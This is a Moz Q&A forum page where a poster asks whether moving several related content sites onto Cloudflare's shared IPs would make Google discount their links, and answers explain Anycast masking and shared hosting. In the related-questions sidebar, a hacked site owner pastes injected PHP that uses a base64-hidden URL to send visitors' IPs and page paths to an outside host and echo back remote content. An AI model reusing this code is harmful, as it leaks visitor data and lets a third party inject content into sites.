How cloudflare might affect "rank juice" on numerous domains due to limited IP range?
-
We have implemented quite a few large websites onto cloudflare and have been very happy with our results. Since this has been successful so far, we have been considering putting some other companies on CL as well, but have some concerns due to the structure of their business and related websites.
The companies run multiple networks of technology, review, news, and informational websites. All have good content (Almost all unique to each website) and rankings currently, but if implemented to cloudflare, would be sharing DNS and most likely IP's with eachother. Raising a concern of google reducing their link juice because it would be detected as if it was coming from the same server, such as people used to do for their blog farms.
For example, they might be tasked to write an article on XYZ company's new product. A unique article would be generated for 5-10 websites, all with unique, informative, valid and relevant content to each domain; Including links, be it direct or contextual, to the XYZ product or website URL. To clarify, so there is no confusion...each article is relevant to its website...
technology website- artciel about the engineering of xyz product
business website - How xyz product is affecting the market or stock price
howto website - How the xyz product is properly usedCurrently all sites are on different IP's and servers due to their size, but if routed through cloudflare, will Google simply detect this as duplicate linking efforts or some type of "black hat" effort since its coming from cloudflare?
If yes, is there a way to prevent this while still using CL?
If no, why and how is this different than someone doing this to trick google?Thank you in advance! I look forward to some informative answers.
-
Thank you for some great information! I am reading it over now!
The concern is not necessarily the page rank or da of the actual sites with the content linking to the other site, but that google might reduce or diminish the link juice of the actual links since they would likely detected as originating from the same server.
It might be 5-10 websites, original content...but not really something we can "test and see"
Thank you again!
-
For a small number of sites I would not be concerned, but if you are worried, Try Microsoft Azure you get a unique ip for each website and they are very cheap with a great interface.
-
Response updated
-
Where did you get that information for all sites being on different IP's? I ask because 3 of the sites we are using for some clients all are coming from the same IP or the same c block or range.
A better question might be if there is a way to ensure they are served from different IP's since we cannot risk it.
Side note, I am waiting for a response from CL as well and will post their info if relevant.
thanks!
-
UPDATED/CLARIFICATION: Responding to your comment "Currently all sites are on different IP's and servers due to their size."
Your server IP addresses (A Records) will stay unique/same. The IP is masked by Cloudflare's Anycast using different IP addresses across the world, depending where used can be identical or in similar range. They cache static content with a short expiry time; for non-cached content their servers proxy through requests to the actual server then forward to a user.
See http://www.quora.com/CloudFlare/How-does-CloudFlare-work for a detailed response from CloudFlare's CEO to a similar question.
Now Google "should" first of all understand how Cloudflare works as a CDN just like it does with other similar CDNs and security platforms.
Does Google care about same IPs no, unless there are spammy neighbors using it:
“… there was recently a discussion on a NANOG (North American Network Operators Group) email list about virtual hosting vs. dedicated IP addresses. They were commenting on the misconception that having multiple sites hosted on the same IP address will in some way affect the PageRanks of those sites. There is no PageRank difference whatsoever between these two cases (virtual hosting vs. a dedicated IP).” Cutts Blog
Should Google figure this out and be able to differentiate the Cloudflare masking yes. But has Google been found with incorrectly diagnosing spam yes, with probably less complex issues to Cloudflare. The question may be do you want to take the risk, or partial risk as you can actually use your own DNS and cloudflare (paid version) again hoping assuming Google will understand.
Hope this helps, curious as to how Cloudflare will respond to this, so please update. But as an SEO'r it would depend how much risk you want to take in this case.
Got a burning SEO question?
Subscribe to Moz Pro to gain full access to Q&A, answer questions, and ask your own.
Browse Questions
Explore more categories
-
Moz Tools
Chat with the community about the Moz tools.
-
SEO Tactics
Discuss the SEO process with fellow marketers
-
Community
Discuss industry events, jobs, and news!
-
Digital Marketing
Chat about tactics outside of SEO
-
Research & Trends
Dive into research and trends in the search industry.
-
Support
Connect on product support and feature requests.
Related Questions
-
Keyword Appears In Top Level Domain
If i add a keyword in my domain so it will help me or not in search ranking.
White Hat / Black Hat SEO | | MuhammadQasimAttari0 -
Linking Anchor Text is simply "." what is the purpose of this?
I have several backlinks with high spam scores. The anchor text as listed is either just a period, or it says there is no anchor text. These links don't generate traffic and there is no way for me to contact the website owner. Is this a case for the Search Console Disavow Tool?
White Hat / Black Hat SEO | | Harley.Helmer0 -
Sudden shift in rankings?
What would make a website move from position 14-17 (for the last year or so) to position 1 for a very competitive keyword when there are no obvious site changes?
White Hat / Black Hat SEO | | OUTsurance1 -
Best practice to preserve the link juice to internal pages from expired domain?
This question relates to setting up an expired domain, that already has quality links, including deep links to internal pages. Since the new site structure will be different, what's the best practice to preserve the link juice to these internal pages? Export all the internal pages linked to using majestic Seo/ ahrefs etc, and set these pages previously linked to? Or 301 redirect these pages to home page? I heard there's a Wordpress plugin that 301 redirects all the 404 errors successfully preserving all the potential link juice.
White Hat / Black Hat SEO | | adorninvitations0 -
Website has been hacked will this hurt ranking
Today we found out that a website of as has been hacked and that they put this code in multiple index.php files: if (!isset($sRetry))
White Hat / Black Hat SEO | | GTGshops
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 8);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?> After some search I found other people mentioning this problem too.They were also talking about that this could have impact on your search rankings. My first question : Will this hurt my rankings ? Second question: Is there something I can do to tell the search engines about the hack so that we don't lose ranking on this. Grtz, Ard0 -
Spammy Links (from .ru) pointing to my domain! How to deal with it?
Hi all, We run an e-commerce store - I am just looking at the apache logs and I am finding a lot of spammy links that have been referrers to our pages - when I check the links, I cannot find our URL in an HREF on their page so I presume they may be using some country based cloaking? These are the domains that are targeting specific pages on our site:
White Hat / Black Hat SEO | | bjs2010
http://3xru.ru/
http://saldoconsult.ru/
http://euro-casino.ru/casino/
http://delaymoney.maroderi.ru/
http://intimhot.ru/ How to deal with this? Our site is about cookware and they seem to be pointing these links to very specific products and categories. Never seen anything like this before, help would be appreciated. Thanks, B0 -
Separate domain name for a subdomain?
I just created a subdomain to help our main TLD website. I was wondering if it's smart to create a separate TLD for this subdomain and set up a forward and build links to it. Reason I was thinking about it because it would be easier for people to remember instead of typing in subdomain.maindomain.com. But, I don't want the main website to suffer, since the purpose of creating this subdomain and it's content is to help the main domain. Any inputs on this? Thank you.
White Hat / Black Hat SEO | | FinanceSite0 -
Is it possible that since the Google Farmer's Update, that people practicing Google Bowling can negatively affect your site?
We have hundreds of random bad links that have been added to our sites across the board that nobody in our company paid for. Two of our domains have been penalized and three of our sites have pages that have been penalized. Our sites are established with quality content. One was built in 2007, the other in 2008. We pay writers to contribute quality and unique content. We just can't figure out a) Why the sites were pulled out of Google indexing suddenly after operating well for years b) Where the spike in links came from. Thanks
White Hat / Black Hat SEO | | dahnyogaworks0